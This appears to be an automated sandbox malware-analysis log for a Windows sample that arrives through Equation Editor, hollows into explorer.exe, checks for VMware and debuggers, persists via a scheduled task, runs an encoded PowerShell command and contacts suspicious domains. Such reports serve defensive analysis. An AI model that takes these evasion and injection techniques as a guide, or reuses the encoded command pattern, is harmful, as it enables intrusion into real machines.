              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\AppData\Local\Temp\A173.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Source: C:\Users\Public\regasm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
              Source: C:\Users\Public\regasm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
              Source: C:\Users\Public\regasm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\Public\regasm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\Public\regasm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\Public\regasm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Roaming\efbhiiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\A173.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 264Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Windows\System32\taskeng.exe TID: 1992Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exe TID: 1252Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exe TID: 1760Thread sleep count: 48 > 30
              Source: C:\Windows\SysWOW64\explorer.exe TID: 1760Thread sleep time: -48000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 2016Thread sleep count: 49 > 30
              Source: C:\Windows\explorer.exe TID: 2016Thread sleep time: -49000s >= -30000s
              Source: C:\Windows\SysWOW64\explorer.exe TID: 964Thread sleep count: 38 > 30
              Source: C:\Windows\SysWOW64\explorer.exe TID: 964Thread sleep time: -38000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 2396Thread sleep count: 37 > 30
              Source: C:\Windows\explorer.exe TID: 2396Thread sleep time: -37000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2116Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\A173.exe TID: 1868Thread sleep time: -600000s >= -30000s
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Users\Public\regasm.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_7-10712
              Source: C:\Users\user\AppData\Local\Temp\A173.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 665Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 616Jump to behavior
              Source: C:\Users\Public\regasm.exeEvaded block: after key decisiongraph_7-10827
              Source: C:\Users\user\AppData\Local\Temp\A173.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\A173.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\regasm.exeCode function: 7_2_004042A3 BuildCommDCBAndTimeoutsA,CreateMailslotW,GetDriveTypeA,GetCurrentDirectoryA,CallNamedPipeA,IsSystemResumeAutomatic,SearchPathA,TransactNamedPipe,OpenWaitableTimerA,FindNextVolumeMountPointW,ReadConsoleInputW,GetLogicalDriveStringsW,CreateDirectoryExW,FindNextVolumeMountPointA,VirtualFree,GetModuleHandleW,GetWindowsDirectoryW,GetMailslotInfo,CreateFileA,TlsGetValue,LocalSize,RequestWakeupLatency,EnumCalendarInfoExA,QueryDosDeviceA,VerifyVersionInfoW,GetEnvironmentStrings,SetVolumeLabelA,7_2_004042A3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_5-481
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_5-445
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: explorer.exe, 0000000B.00000000.972788422.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
              Source: A173.exe, 0000000F.00000002.1188288780.0000000006070000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: BqNVjnPqvMCiyxkYrfEp
              Source: Wlrfmqer.exe, 0000001D.00000002.1195060212.0000000000553000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware_S
              Source: explorer.exe, 0000000B.00000000.972788422.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
              Source: Wlrfmqer.exe, 0000001D.00000002.1206658764.0000000006610000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
              Source: explorer.exe, 0000000B.00000000.979389772.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0lo
              Source: explorer.exe, 0000000B.00000000.979389772.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000=
              Source: explorer.exe, 0000000B.00000000.1034326270.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
              Source: explorer.exe, 0000000B.00000000.972861806.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 0000000B.00000000.945517542.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
              Source: explorer.exe, 0000000B.00000000.972788422.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
              Source: A173.exe, 0000000F.00000002.1178964908.00000000035EB000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000000F.00000002.1155901803.0000000003222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bzh`vfbheqemu
              Source: explorer.exe, 0000000B.00000000.966991833.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
              Source: C:\Users\Public\regasm.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00126320 GetSystemInfo,16_2_00126320
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00123CE7 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,16_2_00123CE7
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00121EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,16_2_00121EBA
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00122C85 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,16_2_00122C85
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000C255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,18_2_000C255C
              Source: C:\Users\Public\regasm.exeSystem information queried: ModuleInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\Public\regasm.exeSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiSystem information queried: CodeIntegrityInformation
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0041105A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,7_2_0041105A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_03760627 mov edx, dword ptr fs:[00000030h]5_2_03760627
              Source: C:\Users\Public\regasm.exeCode function: 7_2_001B0042 push dword ptr fs:[00000030h]7_2_001B0042
              Source: C:\Users\Public\regasm.exeCode function: 7_2_002DC7BC push dword ptr fs:[00000030h]7_2_002DC7BC
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 13_2_001B0042 push dword ptr fs:[00000030h]13_2_001B0042
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 13_2_0029C70C push dword ptr fs:[00000030h]13_2_0029C70C
              Source: C:\Users\Public\regasm.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiProcess queried: DebugPort
              Source: C:\Users\Public\regasm.exeCode function: 7_2_00406DAB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00406DAB
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00121011 GetProcessHeap,HeapFree,16_2_00121011
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\A173.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\Public\regasm.exeCode function: 7_2_004068D0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_004068D0
              Source: C:\Users\Public\regasm.exeCode function: 7_2_00406DAB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00406DAB
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0040620A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040620A
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0040CADA SetUnhandledExceptionFilter,7_2_0040CADA

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 34.174.217.42 80Jump to behavior
              Source: C:\Windows\explorer.exeDomain query: ndtcconsultant.com
              Source: C:\Windows\SysWOW64\explorer.exeDomain query: esplogem.ga
              Source: C:\Windows\explorer.exeFile created: A173.exe.11.drJump to dropped file
              Source: C:\Users\Public\regasm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\Public\regasm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Users\user\AppData\Roaming\efbhiiiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess created: Base64 decoded Start-Sleep -Seconds 30
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess created: Base64 decoded Start-Sleep -Seconds 30Jump to behavior
              Source: C:\Users\Public\regasm.exeMemory written: C:\Users\Public\regasm.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory written: C:\Users\user\AppData\Roaming\efbhiii base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeMemory written: C:\Users\user\AppData\Local\Temp\A173.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory written: C:\Users\user\AppData\Roaming\efbhiii base: 400000 value starts with: 4D5A
              Source: C:\Users\Public\regasm.exeCode function: 7_2_001B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,7_2_001B0110
              Source: C:\Users\Public\regasm.exeThread created: C:\Windows\explorer.exe EIP: 28C1930Jump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiThread created: unknown EIP: 28E1930Jump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiThread created: unknown EIP: 2AA1930
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 60102DJump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 60102DJump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 60102DJump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 60102DJump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 2032 base: 60102D value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 3000 base: FF06B794 value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 1460 base: 60102D value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 2196 base: 60102D value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 1780 base: FF06B794 value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 1440 base: 60102D value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 1820 base: FF06B794 value: 90Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm.exe "C:\Users\Public\regasm.exe" Jump to behavior
              Source: C:\Users\Public\regasm.exeProcess created: C:\Users\Public\regasm.exe "C:\Users\Public\regasm.exe" Jump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii Jump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii Jump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwAwAA==Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess created: C:\Users\user\AppData\Local\Temp\A173.exe C:\Users\user\AppData\Local\Temp\A173.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii
              Source: explorer.exe, 0000000B.00000000.939722171.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.956574276.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.967516064.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 0000000B.00000000.939722171.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.939356183.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.956574276.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 0000000B.00000000.939722171.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.956574276.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.967516064.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
              Source: C:\Users\Public\regasm.exeCode function: GetLocaleInfoA,7_2_0041685B
              Source: C:\Users\user\AppData\Local\Temp\A173.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A173.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\A173.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A173.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\A173.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeQueries volume information: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exe VolumeInformation
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_001753FB cpuid 16_2_001753FB
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0040D3E1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_0040D3E1
